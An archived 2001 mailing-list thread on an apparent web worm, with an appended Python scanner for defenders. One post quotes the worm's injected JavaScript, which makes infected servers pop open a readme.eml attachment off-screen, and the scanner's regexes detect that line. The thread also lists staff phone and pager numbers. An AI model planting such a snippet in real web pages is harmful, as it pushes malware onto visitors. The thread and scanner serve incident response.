Security Incidents mailing list archives

RE: Some more details on the worm


From: "Steiner, Michael" <michael.steiner () akamai com>
Date: Tue, 18 Sep 2001 11:47:36 -0700

I have gone to several infected web sites to test this exploit and I am
prompted if I would like to execute.  I am running IE 5.50.4522.1800 with
128-bit encryption, service pack 1, Q254518, Q279328 and Q299618 applied.

Michael Steiner
Senior NT Administrator
Akamai Technologies, Inc.

Desk:  858-909-3319
Cell:  858-967-4394
Pager:  877-981-6158

E Mail Address:  Michael.Steiner () akamai com
Pager E Mail:  8779816158 () skytel com



-----Original Message-----
From: Davis, Matt [mailto:matt.davis () countryfinancial com]
Sent: Tuesday, September 18, 2001 9:44 AM
To: Davis, Matt
Cc: NTBUGTRAQ () LISTSERV NTBUGTRAQ COM; incidents () securityfocus com;
unisog () sans org
Subject: Some more details on the worm


When pages are served up by an infected server, it looks as though
readme.eml is 'attached' to them.  The server attempts to get the client to
open them through the following bit of code (from the .dll file):

<script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script>

According to Slashdot, this causes the file to be automatically opened and
executed by the client.  I haven't been able to confirm or deny that (but if
someone can, please do).

Regards,
Matt


--
Matt Davis, MCP
Intermediate Client Server Business Support Analyst
COUNTRY(SM) Insurance & Financial Services
309-821-6288
mailto:matt.davis () countryfinancial com
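A defender-side check for the injected snippet quoted above, written here as an added example; it is not part of the original post and not code from the worm or from any tool the thread mentions. It scans page content for a window.open() call whose first argument is a .eml file and flags whether the call also uses the off-screen top/left geometry from the quoted snippet, which is the pattern an administrator would look for when checking whether served pages have been modified. The page names and bodies in SAMPLE_PAGES are constructed for the example, and the scan_directory helper assumes page files with the listed extensions.

```python
import re
from pathlib import Path
from typing import Dict, List

# Constructed sample pages (not real captured content): one carries the
# injected snippet quoted in the post, the other is a clean page.
SAMPLE_PAGES: Dict[str, str] = {
    "index.html": (
        "<html><body><h1>Welcome</h1>"
        '<script language="JavaScript">window.open("readme.eml", null, '
        '"resizable=no,top=6000,left=6000")</script>'
        "</body></html>"
    ),
    "about.html": (
        "<html><body><p>About us</p>"
        "<script>window.open('help.html', 'help', 'width=400')</script>"
        "</body></html>"
    ),
}

# A window.open() whose first argument names a .eml file.
EML_OPEN_RE = re.compile(r'window\.open\(\s*["\']([^"\']*\.eml)["\']', re.IGNORECASE)
# Window placement far outside any visible screen area (top=6000 / left=6000
# in the quoted snippet); four or more digits is treated as off-screen here.
OFFSCREEN_RE = re.compile(r'\b(?:top|left)\s*=\s*\d{4,}', re.IGNORECASE)


def find_eml_popups(html: str) -> List[Dict[str, object]]:
    """Return one finding per window.open() call that targets a .eml file."""
    findings: List[Dict[str, object]] = []
    for m in EML_OPEN_RE.finditer(html):
        # Examine only the remainder of this call (up to the closing paren)
        # for the off-screen geometry, so a later, unrelated call is ignored.
        close = html.find(")", m.end())
        tail = html[m.end(): close if close != -1 else m.end() + 200]
        findings.append({
            "target": m.group(1),
            "offset": m.start(),
            "offscreen": bool(OFFSCREEN_RE.search(tail)),
        })
    return findings


def scan_pages(pages: Dict[str, str]) -> Dict[str, List[Dict[str, object]]]:
    """Map page name -> findings, keeping only pages with at least one hit."""
    results = {}
    for name, body in pages.items():
        hits = find_eml_popups(body)
        if hits:
            results[name] = hits
    return results


def scan_directory(root: str, exts=(".html", ".htm", ".asp")) -> Dict[str, List[Dict[str, object]]]:
    """Scan every page file under root (assumed layout) with the same check."""
    pages = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            pages[str(path)] = path.read_text(errors="replace")
    return scan_pages(pages)


if __name__ == "__main__":
    for page, hits in scan_pages(SAMPLE_PAGES).items():
        for h in hits:
            print(f"{page}: opens {h['target']} at byte {h['offset']}, "
                  f"off-screen={h['offscreen']}")
```

Run against a document root with scan_directory; a hit on a page that should not reference any .eml file, especially one with off-screen placement, is the signal to compare the file against a known-good copy and to check the server for the other changes the thread describes.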

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
